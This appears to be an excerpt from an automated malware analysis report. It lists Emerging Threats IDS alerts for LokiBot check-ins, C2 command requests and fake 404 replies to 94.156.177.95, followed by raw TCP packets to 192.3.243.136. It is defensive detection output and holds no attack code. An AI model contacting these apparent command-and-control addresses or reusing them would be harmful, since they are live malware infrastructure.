2024-11-15T18:15:28.793698+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:29.755022+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:29.755022+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:29.760486+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50026	TCP
2024-11-15T18:15:29.925408+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:29.925408+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:29.925408+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:30.895119+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:30.895119+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:30.900416+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50027	TCP
2024-11-15T18:15:31.052611+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:31.052611+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:31.052611+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:32.048760+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:32.048760+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:32.054223+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50028	TCP
2024-11-15T18:15:32.214108+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:32.214108+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:32.214108+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:33.168332+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:33.168332+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:33.173572+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50029	TCP
2024-11-15T18:15:33.332376+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:33.332376+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:33.332376+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:34.322493+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:34.322493+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:34.327921+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50030	TCP
2024-11-15T18:15:34.479837+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:34.479837+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:34.479837+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:35.461033+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:35.461033+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:35.466271+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50031	TCP
2024-11-15T18:15:35.618188+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:35.618188+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:35.618188+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:36.584405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:36.584405+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:36.589634+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50032	TCP
2024-11-15T18:15:36.745165+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:36.745165+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:36.745165+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:37.681743+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:37.681743+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:37.687213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50033	TCP
2024-11-15T18:15:37.835646+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:37.835646+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:37.835646+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:38.775422+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:38.775422+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:38.780886+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50034	TCP
2024-11-15T18:15:38.930011+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:38.930011+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:38.930011+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:39.883593+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:39.883593+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:39.888799+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50035	TCP
2024-11-15T18:15:40.041826+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:40.041826+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:40.041826+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:40.978031+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:40.978031+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:40.983503+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50036	TCP
2024-11-15T18:15:41.133212+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:41.133212+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:41.133212+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:42.128775+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:42.128775+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:42.133977+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50037	TCP
2024-11-15T18:15:42.287477+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:42.287477+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:42.287477+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:43.271865+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:43.271865+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:43.281944+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50038	TCP
2024-11-15T18:15:43.432085+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:43.432085+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:43.432085+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:44.406130+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:44.406130+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:44.438768+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50039	TCP
2024-11-15T18:15:44.558614+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:44.558614+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:44.558614+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:45.498060+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:45.498060+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:45.503504+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50040	TCP
2024-11-15T18:15:45.645313+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:45.645313+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:45.645313+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:46.635568+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:46.635568+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:46.641061+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50041	TCP
2024-11-15T18:15:46.938497+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:46.938497+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:46.938497+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:47.899602+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:47.899602+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:47.905044+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50042	TCP
2024-11-15T18:15:48.053000+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:48.053000+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:48.053000+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:49.008238+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:49.008238+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:49.013886+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50043	TCP
2024-11-15T18:15:49.198772+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:49.198772+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:49.198772+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:50.170092+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:50.170092+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:50.176256+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50044	TCP
2024-11-15T18:15:51.314217+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:51.314217+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:51.314217+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:52.304139+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:52.304139+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:52.309323+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50045	TCP
2024-11-15T18:15:52.472929+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:52.472929+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:52.472929+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:53.784154+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:53.784154+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:53.790066+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50046	TCP
2024-11-15T18:15:53.951386+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:53.951386+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:53.951386+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:54.916540+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:54.916540+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:54.922369+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50047	TCP
2024-11-15T18:15:55.077914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:55.077914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:55.077914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:56.055649+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:56.055649+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:56.061021+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50048	TCP
2024-11-15T18:15:56.206763+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:56.206763+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:56.206763+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:57.189916+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:57.189916+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:57.195280+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50049	TCP
2024-11-15T18:15:57.353617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:57.353617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:57.353617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:58.301640+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:58.301640+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:58.307066+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50050	TCP
2024-11-15T18:15:58.470891+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:58.470891+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:58.470891+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:59.440010+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:59.440010+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:59.445468+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50051	TCP
2024-11-15T18:15:59.601399+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:15:59.601399+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:15:59.601399+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:00.576896+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:00.576896+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:00.581983+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50052	TCP
2024-11-15T18:16:00.728619+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:00.728619+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:00.728619+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:01.676781+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:01.676781+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:01.682183+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50053	TCP
2024-11-15T18:16:01.834858+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:01.834858+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:01.834858+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:02.815850+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:02.815850+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:02.821050+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50054	TCP
2024-11-15T18:16:03.165663+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:03.165663+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:03.165663+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:04.169499+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:04.169499+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:04.174978+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50055	TCP
2024-11-15T18:16:04.337364+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:04.337364+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:04.337364+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:05.363656+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:05.363656+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:05.368969+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50056	TCP
2024-11-15T18:16:05.839274+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50057	94.156.177.95	80	TCP
2024-11-15T18:16:05.839274+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50057	94.156.177.95	80	TCP
2024-11-15T18:16:05.839274+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50057	94.156.177.95	80	TCP
2024-11-15T18:16:06.517735+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50057	94.156.177.95	80	TCP
2024-11-15T18:16:06.517735+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50057	94.156.177.95	80	TCP
2024-11-15T18:16:06.523288+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50057	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 18:14:08.224564075 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.229861021 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.233555079 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.233702898 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.238748074 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904371023 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904465914 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904488087 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.904547930 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904613018 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.904683113 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904735088 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.904761076 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904808998 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.904864073 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904913902 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.904927015 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.904959917 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.904990911 CET	80	49704	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:08.905040026 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:08.905059099 CET	80	49704	192.3.243.136	192.168.2.5
